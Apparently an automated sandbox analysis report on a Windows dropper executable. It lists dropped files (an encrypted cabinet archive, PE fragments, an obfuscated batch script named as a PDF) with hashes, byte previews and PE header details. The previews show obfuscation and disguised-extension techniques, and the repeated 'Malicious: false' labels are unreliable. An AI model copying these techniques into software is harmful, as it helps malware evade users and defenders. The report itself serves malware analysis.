File Type:	Microsoft Cabinet archive data, 489997 bytes, 12 files, at 0x2c +A "Protecting" +A "Merger", ID 9257, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	489997
Entropy (8bit):	7.998624712832474
Encrypted:	true
SSDEEP:	12288:tjgYWAOESK8v4lRcSTpgJH/zqEKKb8wMLAXBweGr:hLWAOESDeRcegJfzhKKIwxe
MD5:	CAE83B7E4A8600EA4E87516710F95FC9
SHA1:	0530776BA59B6CD8C6EB7CD656537ADF60B07FD9
SHA-256:	BB991824A519356E99BEDEE67FE1F776BA580B7F61115D6485A7F855C8548666
SHA-512:	DCC7C360B7BB9AB0E0E28CE764AC1E5E4E758A9C374F088941E682DCC4FA09A3EEE826AF078A415F7A823825B5A0FB7363C10E80523012E5F7DD9B8077431357
Malicious:	false
Preview:	MSCF.....z......,...............)$..R.................eZ. .Protecting...........eZ. .Merger...........eZ. .Apparent......y....eZ. .Agent..(...u....eZ. .Architect..(........eZ. .Pickup...........eZ. .Intimate...........eZ. .Handhelds..P...Y....eZ. .Den.\R........eZ. .Relatively.....[.....eZ. .Phases.....[.....eZ. .Convenient...CicC..CK.{\|...?<.;I&d.,. r. A.x.,.I.4.v.eqC..H..iXo...Z......c..+O.....+.H...&4.T.@5.\|.4.Y'jD.,.2..sfw.A...<.<O.3..9...\.3g.^5r...a...t.av2.<......&...R...oO.iZ...[.V.d....'..q....s....U...=....wKa....\u..#2#u...'G.o.U.R...w..^u.....IIU..}.;.[.......y.i.......................[.7....o.......3..D........0.L....'.8...\fJ1........q....c...d.k.....D.wf[*e.w.W.....n...V.A,...T....8.).......a...0./06..Z.t....%.....cz..j....W.......<..s..+o.ng._.5.}...k...A.y.....`.V.Y.uZ...........B..N..Z.Z_.....w......<?..............`.j....U...5W.`.K.V.?21U.1...`).S-F......q...c...3.L..c.0.Qg.xT....eT.1."..G..W?.F..Z#"......q..1.].

C:\Users\user\AppData\Local\Temp\Merger

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.67666988967826
Encrypted:	false
SSDEEP:	1536:PBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cxi8qb:PBiqXvpgF4qv+32eOyKODOSpQSAU4CEb
MD5:	F3C4B7DAC0D85E0D975C094558CFC6AC
SHA1:	5DFAF51D3D89D8C8766C2CD0FC69F63A18B8EA2A
SHA-256:	D763824D4038D34D4D6A30F828104E2813100901EFE3B911F02C0EC169C70EC2
SHA-512:	4FF11321A57FC4A9245A66A2BC548BAA02899D6614FDB704C7FC1043EFFCE8CAF16F5F0CFB8CD61A46BBF4D9696EED4491A1CD940AD5FCF460B33DD53B70675D
Malicious:	false
Preview:	^.S3.9^........:..........B...........^8.^......F.9^........v...F1..P.!....F....t....w..$..rB....X....E.N(..^$.^0.^ .^,.^<.8........'..........^(.!...A........................h....F....F1....k....F...P.....P......J....F.[^.I.\rB.erB.zrB..rB..rB..rB..rB..rB...V..H.........u....^.S3.9^...................&...........^8.^......F..9^........v...F2..P.6....F....t....w..$..tB....Z....E.N(..^$.^0.^ .^,.^<.8........'..........^(.!...L.........................g....F....f.F2f....g....F....P.....P......E....F.[^..ysB..sB..sB..sB..sB..sB..sB..sB...V..H.........u....^.S3.9^...............................^8.^......F..9^........v...F2..P......F....t....w..$.!uB....Y....E.N(..^$.^0.^ .^,.^<.8........'..........^(.!...,........1........0.......g....F....f.F2f....g....F....P.....P......E....F.[^...tB..tB..tB..tB..tB..tB..tB..tB...A1.. t-...t"...t.H...t....u..I ....I ....I ....I ...I ......A2.. t-...t"...t.H...t....u..I ....I ....I ....I ...I .....X.....u.............2.....c.....u..

C:\Users\user\AppData\Local\Temp\Oriented.pdf

Download File

Process:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	7.996775337636935
Encrypted:	true
SSDEEP:	1536:swbBtaLhWszd1QexBagAIVFZAzRkT8mIV:paLAUnQex9VZAzST8LV
MD5:	8253340EDFA7CC0820C132312F22373D
SHA1:	208996E6840C4A8F544AB2FBB2A1C200104823A9
SHA-256:	F5E4F123B5416FBBEFA18826D5516A929589EA75080211B2FB20CDF16D4958A5
SHA-512:	A6E3910F5BBF9399C7D20122452103BF6C896257524C914C15CB1E41DBFEED8811F8C20CC9D65657FD173501E86B42D44E88B8CB1D95115DCBF49A2E7D382153
Malicious:	false
Preview:	...).Vg.KN..."...L.).bDl.......J...MJP.L..U..J...W...uY.....O.b5._.$v...QU........lg...P......J#@..D...F.g@.W5..A<R.....:.. ?p.e..;..%.-.4....u...d...$B.3.......h......n5....m...6.X...,....!&...Y.2}...R..f..3.Sc6u...d..Y%G .....h\|.....3B..w6WS-.d..C..A]}.p..( ..l.v...E...nr2..Bx...gc.%...j.M...HGqh[!.Tpb......vx Z....X...5+....Q.-te..K..xx......D..8+07C1...N$T.......4q.Q..P..-.-?..U.....C)V.&.l..+\....?..+.h.y..t!B...\r..G0....5.AR.B.\|..wy...Mq...v}H..8..u@i..I._.G.f.A..F...c-..5.{G+.E....p...<.K...#..N.h......e,..=.....Q....s 3J.8HT..T.....o]V..............Ql....&.4H..... ..s..I.B...."..C.!8J.,x_ H...Y\..bI#..s.P.iT....3.......A..............~7q...$..ts. ..c.O=;#. ..F.L..........."$.K.U...8.........E..~.\|...<w#H1........-~"2..tp......Z...`A.b...Z.....f..;(..../BY...*Y.$....^....i.D.QB.a.+I...V.cx...;.y..M$1...I.q...@^.....+A..7.BE..../..Z. ?..:"..vEAI..4e........... .5..7..ADq.>./Aj..1^h...6L.4+ps......V.nK..>.......c..r....q./...i03..k..l.

C:\Users\user\AppData\Local\Temp\Pastor.pdf

Download File

Process:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File Type:	data
Category:	dropped
Size (bytes):	80896
Entropy (8bit):	7.997917561721419
Encrypted:	true
SSDEEP:	1536:zLr8KcKfd+Kp8UipAZ9rnGhBx08of9PWxZiInkgRoN6iLR4dZY:fWKF+Kp8bKWbo4rkjAI43Y
MD5:	AF6CAD815DC867E726441ECA10662953
SHA1:	242479CD9D5B50B8F6CDF04D8006AC9AFAFD6F58
SHA-256:	EE5AAAD337D8373EA88A3C51CF9B729F1FAD2AA3FAAFCC388D386335C25CEC89
SHA-512:	03CD0BE0323C0CF4ED9CE71B0ED669CFBAC87E298CF7858B9FC638E4A1B807B0A373595D0CDD08D7849CBEE44CDB75357146386C059C4BBB6A75D63EA1ED6C8E
Malicious:	false
Preview:	.....T....9.j.JO.(..)..vH.rw..5L0.{..^...s.L.ac...a.b.t..]}:..l"....6.{A\|B.WI.&.....[..QN(..Q..w[.Ee....G...).\|......+....-Z.6eY..J...CB....Hu.-q..@..e....0...N.P.}....k....V...!.]!.N.w........Vb..sc........V?.......2..w.N.E.3........Q...pFt.7.....^....F.^3.......N..jwM. tz.b"2..u.u.........m..Io..B............h..............K51.6.Dm.r....5U....9:.v.v.Q.R.x...cs..i......b ^.........~.%qk..}h.6\k..c...^7.~[..@#.DM..._...`.......$..0..2.Z.y.&7../r../.92M.P....8.&.%~+E.W.#...g.Y..;.....EQ..._~.}T;..y.o)..e.s.....E..^...7Fx........!.\....9..3E...s..2[.9r"v...SQ..-..t.sTg.?.w..:.m....3....g...o..8st...}.DfI.Y.@...z..F..=X.....f.....N.......x8.."\|... ........kre...j.....+...T.....{7..I..#....C...<3nK....m}.^...,.Cc%..*=...h..C....`..K.......?...\|...k.19I...3D......w..........>n.2l`........Y...@q=_D#.+.......].p...!....3.{.......BG.]C.cev5/b.B....V.,..5.t....@&d......3.SJ<..b.d0.......A....`..$T...^[.3a..$.....fp0ML...P

C:\Users\user\AppData\Local\Temp\Phases

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	56320
Entropy (8bit):	6.657483532843025
Encrypted:	false
SSDEEP:	1536:VkvyNf7Xw2U0pkzUWBh2zGc/xv5mjKu2IwNnPS:OaW2UDQWf05mjcq
MD5:	2FD35C7CC9D620F0E1054787381E08E9
SHA1:	D37F41D8EEB64A27D7583D8DEE8CD2C3B54C9D51
SHA-256:	D52F124A587A435B8B913BF8E63E418A607F2C119AEBEFC3F1E430C1BC7F010C
SHA-512:	622B6668D9A2DC33E9FCD8EEAA41F88D1567B67893578B8C65387D370C8C2D7DDC012D5DA9463C681EC64E8E3BA30987104F544548AF4360DA9B489FA647CDB2
Malicious:	false
Preview:	.J.....M.3%H.....M.........M.........M.........M.....f....M.......M...J.....M..&H.....M.........M.........M.........M.....f....M.......M.,.J.....M.ZH.....M.........M....... .M.......$.M.....f..(.M.....,.M.p.I...8.M.. H...<.M.......@.M.......D.M.......H.M.....f..L.M.....P.M.@.J...\.M..!H...`.M.......d.M.......h.M.......l.M.....f..p.M.....t.M...J.....M..+H.....M.........M.........M.........M.....f....M.......M.X.I.....M.S.I.....M.........M.........M.........M.....f....M.......M...J.....M.:.I.....M.........M.........M.........M.....f....M.......M...J.....M...I.....M.........M.........M.........M.....f....M.......M...J.....M.- I.....M.........M.........M....... .M.....f..$.M.....(.M.@.J...4.M.. I...8.M.......<.M.......@.M.......D.M.....f..H.M.....L.M...I...X.M.v!I...\.M.......`.M.......d.M.......h.M.....f..l.M.....p.M...I...\|.M.."I.....M.........M.........M.........M.....f....M.......M...I.....M.#I.....M.........M.........M.........M.....f....M.......M...I.....M.X$I.....M.........M......

C:\Users\user\AppData\Local\Temp\Pickup

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	141312
Entropy (8bit):	6.674401645527659
Encrypted:	false
SSDEEP:	3072:iHSBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESvG:BNPj0nEo3tb2j6AUkB0CThp6vG
MD5:	BC82CE067085C50512B23A194FCCA069
SHA1:	37BB384188A6FC39F591E332D946952258C2ACF9
SHA-256:	BFDE0C6E0A862A03BF5B5B0F364B369ACA11C200833A3302B181E3A48D7602AE
SHA-512:	90D7079124807FDB44D8B6C9008D70A4038C13377B2120F6406390DC0D7F8A1038166EE228EB32B6C79B612676137FFEE4822BA159775AA25669B9F7F798714C
Malicious:	false
Preview:	E.}..M(.^1..j+Y;.t%j-Y;.t.....U../...+..j9Y.U.;....+..j)X.E...J....E.E.A\|........A\j}_...........M(.A\....}.u.....3....j)...u.Xf9....%..........V...j=.u.Y...f;.t.j>Yf;.t.j<Yf;....$.........j)Yj>.M..3.Yf;....U.......U.3.E..jv..T...Xf...u.j.X....x.....u.j0_....U.f;.r=....j9Xf;.w.k...w......u.......;...5$.........f;.p...s.U.j)Xf9...$$..f...M(j.X..].E.+A...@f..3.f.B.j.X...]2..............F.j!..Z;.......j=Zf;............f;....#...E(..j.[..@.......#...r....j0.u....Y.].u.f;.r.j9Yf;...R$.........f;.w7.M(..j.[.y.......U...8t..r..u........u.f;.h...v.].M.+M....},..M...5....U(j<_j>.B@@.E.3.f;.[...H.....f9....#...z0.'.....#...A.;B4~.j .B4X;....#...z(3...9B0~`;O.u?..Q.M.....Y..u,.E.9G.t=.E........"...U(.E.Bx.M.C...;Z0\|....U(.E.9G.u.E...A........U(.u..B0;.\|x.](.K8;.\|@.<.k..P......Y....d"..kC8.P.s(V.Vh......{8.~..s(.p...Y.C0.s(.{8.U.k...C(...kK0..C(.U..T..kK0..C(.U.T...C0.u..M(j.X...u...-..j._......U.......}..-...E..j.X....M.....&..3...E...+.......#...]..E.SP.N..U..'

C:\Users\user\AppData\Local\Temp\Protecting

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	2559
Entropy (8bit):	5.3625058419203535
Encrypted:	false
SSDEEP:	48:f9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+MS:lSEA5O5W+MfH5S1CqlVJcI6S
MD5:	B66A71BEA67FD3631A15D4B80CDB89C2
SHA1:	C0A281FF1715BC091BAB6C3A1424AE41F25E633E
SHA-256:	FBAE82DEAB7BBB373B16A5F564DCADE0EBA80E1C63DD8A63ACA93547E8B0E63F
SHA-512:	6D5697BAE6B992F3B4E5ADC912185B0B04D4009875DB4C5F373DD8827A12BD1BA00DFA3A2D63A1FA53342A38A2637857EF306C76CEA987AE1F03008EF3C487A4
Malicious:	false
Preview:	Die........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.............................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Relatively

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	21084
Entropy (8bit):	7.3125543652549405
Encrypted:	false
SSDEEP:	384:XHwWV8tnwmTihbn929MwO/ChZrzmZGhLdXVaeCVrVEVFJ8ZcGwGBk7/UMQ3rw:XByLiFuO/ChgZ45VatJVEV3GPkjF
MD5:	7E90A90B850650222B2764FC368D4055
SHA1:	333D3A436ED59FB7F0F7CEE22F0E4BA7370B77E6
SHA-256:	AF1A664D014C740F51585F7B31FB9CFFF3C53B79E0D9BC76F619EF268408E6FB
SHA-512:	1B8925CA070A7A2F56521EAF6C908F0F4974629F24590595C8A414E85BDF06EF954DE924A4F33B79177503FAADBD667E0AD1157C37131133C66F9D212463BFA3
Malicious:	false
Preview:	$0,040<0D0.0.0[1b1.2.2.3.3.3.3.3.3.3.3.5.5.6.6.6.6.:.:$;{;.;.;.<$<V<b<r<.<.<.<.<.<.<.<.<.<.='=1=>=v=\|=5>.>...........0.0R1{1.1.1.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3-3Y3a3l3.3.3.4,4.4.4.4.4.4.4.4.4`5.5.5.6i6.6;7z7.7.7.989F9V9b9.:.;.;.;.=4=H=.>.>.?.?~?.?...........0.0=0v0.0.0.0.0.0.1.3.3;4D4N4T4Y4d4i4q4.4.5N5_5.5.5.5.5.6.686Z6l6.6.6.6.6.6C7w7.7.7.7.8.8+828a8.8.8.8.8.8.8.8.9$939:9P9x9.9.9.9.9.9":7:b:n:}:.:.:.:.:.:.:.:.;.;.;.<.<.<8<B<X<^<.<1=J=w=.=.=.=.=.=.=.=.>M>T>c>n>.>.>.?e?l?.?.?.?.?.?.?... .......0\0.0.0.0.1.1)1=1D1[1b1h1.1.1.1.1.1.1.1.1.1.1B2d2.3.3)313b3}3-4L4.4.435^5.5.5.5.696d6.6.6.6"7>7s7.7.7.7.8:8o8.8.8.8.8.8.9P9.9.9.9.9.9.9.:.:/:I:c:}:.:.:.;.;.;.;.<9<n<\|<.<.=.=.=.=%>A>.>.>.?.?.?T?v?.?.?.0......O0.0.1i1.1.2.2.2:3P3.3.4.5I5[5y5.5/6\6.6.6.6.7%7,737H7q7.7.7!8.8.8.92999L9.9.9.:.:@;Q;.;.;.<(<.<.<.<.=B=q=.=.=.>.>.>.>.?_?.?.?...@......}0.0R1.1.1.1.1y2.2.3.3.3.3^4.4.4.4.4.4{5.5"6p6.6.6.6.6~7.7.7.7.8.8(8;8D8W8.8.8.8.8.9.9.91:.:.;"<.<.<.<.=@=.=.>.>.>U?.?...P.......0C0n0.0.0.0.1E1U1h1.1.1

C:\Users\user\AppData\Local\Temp\Updates.pdf

Download File

Process:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File Type:	PGP Secret Sub-key -
Category:	dropped
Size (bytes):	56320
Entropy (8bit):	7.9966799527795915
Encrypted:	true
SSDEEP:	1536:fuyyalTT3f/VCOgux8KAWQwgprfhYCcm/DMu64bWsbAIrfqUG:f7LFrnVdl0WTCIR4bRZrfqUG
MD5:	BB6B99A871C3365195AEE4655C40482B
SHA1:	760FB6B4721478D9D703C009EC7E029EAE346560
SHA-256:	2654EE50C8E177B1B25BF32ED4359AE8CD726F65F2E3EF1BECE4DC5E6A9ACA03
SHA-512:	81DC161048B2955070412A054D4EF4FF20B2A62971120DD5A5FA71BCDB093EC0651DD71A7E07F7B29D985E170B0056397A03A50D4F7C238A79C86D1D81530CCC
Malicious:	false
Preview:	..G.@-..)EV1....}.&...i.4o.xR$...l.o.N.......u.A.s.V.:..),..Z.h.5m@/LQ..J....M..w.;._..B...VmF...R'....%W...b.-....~.0..at=....PPL..SkK..&.X%t..>..ce..^MJ..I..N...K...oR1t.AN..$...VN...hq]......mr.43v....C%...'..2.x.....u....H.;..u.1.[.$L.......g...%u.yz.$....0e7qs..V...s...p...#...v@Ye.#6.......z.~f6.`..K.....w...0..I3.......".......>.....BG:...In....?...ue8..L...K.i(6...h.C...2...'..._..I......bW"7......'....z..#.$.v6U.....~o2.....#\|FE7.... f...=c..^F.X.......)., ....0...1..u.e..J..b=.`.@.p....:..b..{..f..O...........G..qZ...+f...^g.....3...q.K....7..M...9...$..h.[.....8.7.@.......I.{..Dg.o.......?..u....J...a{...5J..%.Q..K.....{I........%r$..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R\|...A.N.'.F...h..................."......"kC.R......%x....}...q..U-...(....%....V..?p.h

C:\Users\user\AppData\Local\Temp\increases.pdf.bat

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	ASCII text, with very long lines (747), with CRLF line terminators
Category:	dropped
Size (bytes):	11804
Entropy (8bit):	5.167705642471121
Encrypted:	false
SSDEEP:	192:W9y6DHQYrQaisDZzZqCKGqUHsgSZL2gMIK+3EjFDCQVLXcLSoBJ06EEIYMKBHJ1n:WwCHQYrdDCCdmgyUIlrQMD06E1iR3hau
MD5:	5B022D12C808072C92D84602C71065AF
SHA1:	37C9B62E687333545F80EDD826235C061EFB2B7E
SHA-256:	910A06731E2691E663536C2B53D6CD74008E8C83400ECEA9893F8A27E79F7DEE
SHA-512:	04916388D799931EA3F7C04588A76B1FFBC298F5BDAD20C2A30653F03AF804BE5E29A0D0CB90F1FD85AE7473EB565E6C62A77702AF443CFF03A84B399EEC3D28
Malicious:	false
Preview:	Set Coal=w..ppvMAccredited(Sms(Ago(Feed(Behavior(Depends(Happens(Implications(Hacker(..LHzmNicholas(Regular(Centered(..KXxWings(Fold(Booking(Perceived(Farmer(Cj(Railway(Pa(Andorra(..WfHandbook(Truck(Hungary(Skilled(Womens(Hung(..LqcRender(Internet(Banana(Imports(Animals(Visitor(Annually(Admissions(Nw(..eZZEDriver(..iJvbOpening(Consistency(..KHLADale(..XuVTDrinks(..Set Enquiries=n..oKProceed(Thousands(Hell(Relationship(Vast(Outputs(Sending(Angle(..GoyBond(Pest(Rat(Posters(Sparc(..WxkMLearned(Probe(Cartoons(Possibilities(..IMqAffect(Consoles(Sv(Masturbating(..jLCs(Portable(Ireland(Constitute(..isClaim(Processed(Framed(Helping(..vmoqDevices(Knitting(Bros(..Set Blue=X..KyMgIma(..dLpXCartridges(Gray(Diary(January(Put(Side(Polyester(Syndicate(..VoMilton(Photos(Attacks(Phd(..FKYPolitics(Affiliate(Order(Webmasters(Downloadable(Organ(Moment(..iUdWillow(X(Zen(Predict(Vt(Bra(Volume(..mmVerzeichnis(Fluid(Radical(Him(Gardens(Atm(Remark(Both(..ZynOrganisms(Launch(Ill(Compliant(..Set Measures=d..BBFS

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	ASCII text, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	182
Entropy (8bit):	4.693530917321555
Encrypted:	false
SSDEEP:	3:RGXKRjN3MZ9aSLKLbzXDD9jmKXVM8/FAJoDYTzMK+DtDotwMNDm5AJkbow:zx3MmSLQHtBXVNsTN8xoqMRm5AJs7
MD5:	F92F29BD16B24BB03ED4B92321DB2E0F
SHA1:	547A3F64016AA114C18B94CD7EC7AF8CE2D9762B
SHA-256:	03C989BDD614C64697C1B9057983DEA4B01005C547A6A2C07AAE1F725D89DDE1
SHA-512:	263D8FB3031C0A6B95134A47F1B6591D94690B371F9F6B8474885BA8BCB5852016D407102194C0BE696729C80654A03A9D2F0CCCDF1EA23B819A68AC7CFBBFA7
Malicious:	false
Preview:	Microsoft (R) File Expansion Utility..Copyright (c) Microsoft Corporation. All rights reserved.....Copying increases.pdf to increases.pdf.bat...increases.pdf: 11804 bytes copied.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.962965016948796
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File size:	1'483'827 bytes
MD5:	5c4ca3e7135a0641ac01fbd73cd90ca8
SHA1:	8297854dea681618bf432d5086dcd833aa416530
SHA256:	4366cb256d6331d8634dff8847c2334e18baefa6b7f41ae2db3a8801a0aa9a72
SHA512:	f7b34cf19b55817aeb79fc079af9189d058ed89e6bd844e9fed6f703f0e7d00da99b0790a75f2068f423d12a46e8e86426fe17edfc3c638de604fda2379a7151
SSDEEP:	24576:5G7u7tZv0wko/Q4UbOpMlV6tXJzyR+psawLc2ADordo71L7a5KCTOXGBTt5N8J:I7u7t6wkoIXIMlVyXI0BwLhA6dyPa5Kp
TLSH:	B36533D99AFD5436D5D30EB20E318F210CACBC602420561F9385B99A75F3B9D89ACF6C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

File Icon


Icon Hash:	6970f0b0f0f071b2

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007F81D52FB6ABh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007F81D52FB38Dh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007F81D52FB37Bh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007F81D52F8C7Ah
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007F81D52FB051h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F81D52F8D03h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F81D52F8C7Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0x5f050	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0x5f050	0x5f200	0c5343685994638a0b534700cd0d57bd	False	0.9613147790735874	data	7.845012808563989	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x154000	0xf32	0x1000	8802943328c95a47d5906a5c491da02c	False	0.99853515625	data	7.808999300076349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf4280	0x54b75	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced	English	United States	0.9841151364421018
RT_ICON	0x148df8	0x41a0	PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced	English	United States	1.0000595238095238
RT_ICON	0x14cf98	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.46328315703824247
RT_ICON	0x14f600	0x1f04	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0013853904282115
RT_ICON	0x151508	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.46835154826958103
RT_ICON	0x152630	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.4379432624113475
RT_DIALOG	0x152a98	0x100	data	English	United States	0.5234375
RT_DIALOG	0x152b98	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x152cb8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x152d18	0x5a	data	English	United States	0.8
RT_MANIFEST	0x152d78	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, 